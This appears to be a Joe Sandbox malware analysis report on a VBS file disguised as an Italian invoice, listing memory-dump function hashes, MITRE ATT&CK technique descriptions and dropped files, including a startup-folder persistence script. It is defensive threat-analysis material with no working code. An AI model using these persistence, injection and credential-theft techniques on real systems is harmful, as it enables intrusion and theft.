Opcode Fuzzy Hash: 161e4477ea92a58a9a933756e581ad478caeebe5f0a6ff6a47c77567084c25bc
Instruction Fuzzy Hash: E690023528464CCB854167E5B519665BB5CE6455157800051B50D425119E5D6C1445D5

Function 0552D360 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c2aca32fbc7ee239ed0b341b5e6c52c5f65094f1a7a8d8397621125c859c86
Instruction ID: b79a3c6763a454d4d445dc8a1d61c9289576fc431c2254d8b9e6594982b50887
Opcode Fuzzy Hash: 81c2aca32fbc7ee239ed0b341b5e6c52c5f65094f1a7a8d8397621125c859c86
Instruction Fuzzy Hash: 6590027548460C8F46402B957509665775C9544715F921451E50D415016A5574204695

Function 0552D8C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfdfc66519974d16f92144b84f6757e6252feb506aeb60d84a550be997ba00b
Instruction ID: c21a965c1bd1d2946c02af33cf3895f5bbe287b1acc1803a6a5858536b8d61f8
Opcode Fuzzy Hash: 3dfdfc66519974d16f92144b84f6757e6252feb506aeb60d84a550be997ba00b
Instruction Fuzzy Hash: 4690027148460CCB464067A57409665775CA544715F950851E51D815016A5675209695

Function 05527990 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8e2f926e1bdba14643e7b0e6b19470cd5249f6e4c100cd794cb3c7b9ef7855
Instruction ID: 807693f3975c5da2cd4f859994e285bf621ed47ea835963f575668f3a6b6c03a
Opcode Fuzzy Hash: 0a8e2f926e1bdba14643e7b0e6b19470cd5249f6e4c100cd794cb3c7b9ef7855
Instruction Fuzzy Hash: 19900276494A0C9B474027A57C09555F75C9548625B904451E90D81A025A65B5304A95

Function 06754CE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5779f92b19a829c6bf77d291891fe8503185529b5d959ae9db541d7259f54f73
Instruction ID: 1aaae12dc135393cca786f4c0422cd9d5f30cff770ee724e899f8170e2b1559c
Opcode Fuzzy Hash: 5779f92b19a829c6bf77d291891fe8503185529b5d959ae9db541d7259f54f73
Instruction Fuzzy Hash: 7490023105570C8B4F402795740A995FB6CA5445157950091FA0D415215E5974504595

Function 067564D0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60da8888c4c5adaf1997ddcea3407d27ffdf18fd8bd989d617f4cd9aba1ec5db
Instruction ID: bfdb12d5e410476f43eff6e2b0423b43f8ed612e14ac3f9ab596f9718a0373ad
Opcode Fuzzy Hash: 60da8888c4c5adaf1997ddcea3407d27ffdf18fd8bd989d617f4cd9aba1ec5db
Instruction Fuzzy Hash: 2390023509860C8B87442795785A6557F5DF5445157841051B50E415016F55645085A5

Function 0675EDF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e2c7ba7b403596c7114750a43b033849493144c50997a2c818f385fc172a5b
Instruction ID: 87cbdab5f08902d3b3d82d4ca91ca4714d2d1caccdc644c88fa74652080525a2
Opcode Fuzzy Hash: 87e2c7ba7b403596c7114750a43b033849493144c50997a2c818f385fc172a5b
Instruction Fuzzy Hash: 0290023108460C9F494027D9B409595775D99849367A08455B60D815019A55785045A5

Function 067548F0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40deab53a7a46e00fd1a5f46a34f714e7c1e267a516febfa853c8b6726064484
Instruction ID: d36e6b9d8e7c7a08e5af2657a60271da434b3fe8548b728f8813d442eff57a75
Opcode Fuzzy Hash: 40deab53a7a46e00fd1a5f46a34f714e7c1e267a516febfa853c8b6726064484
Instruction Fuzzy Hash: 3E90023105570C8B4F4027D5740A995FBAC95445157804051BA0D425325E6974504595

Function 05521E65 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b893b9ed7705df1a123251eef1dc12f8157e26037c87ebbb88882c61df9dde0d
Instruction ID: b68d4e0ba419896ee3490caecc047bb635cfdb7a4078b127f5ca106fe780da78
Opcode Fuzzy Hash: b893b9ed7705df1a123251eef1dc12f8157e26037c87ebbb88882c61df9dde0d
Instruction Fuzzy Hash: 2DA0123055003497D7008600DD0C9583222BB40311F004420A002411D0993068048705

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fattura-24SC-99245969925904728562.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nuhi4yi.ymc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ch103yy.jim.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qlkpqgk.hpo.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

C:\Users\user\AppData\Roaming\OSDescription.vbs

C:\Users\user\AppData\Roaming\OSDescription.vbs.exe

C:\Users\user\AppData\Roaming\OSDescription.vbs:Zone.Identifier

C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Static File Info

Windows Analysis Report
Fattura-24SC-99245969925904728562.vbs

Function 0A031D70 Relevance: 3.1, Strings: 2, Instructions: 629
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre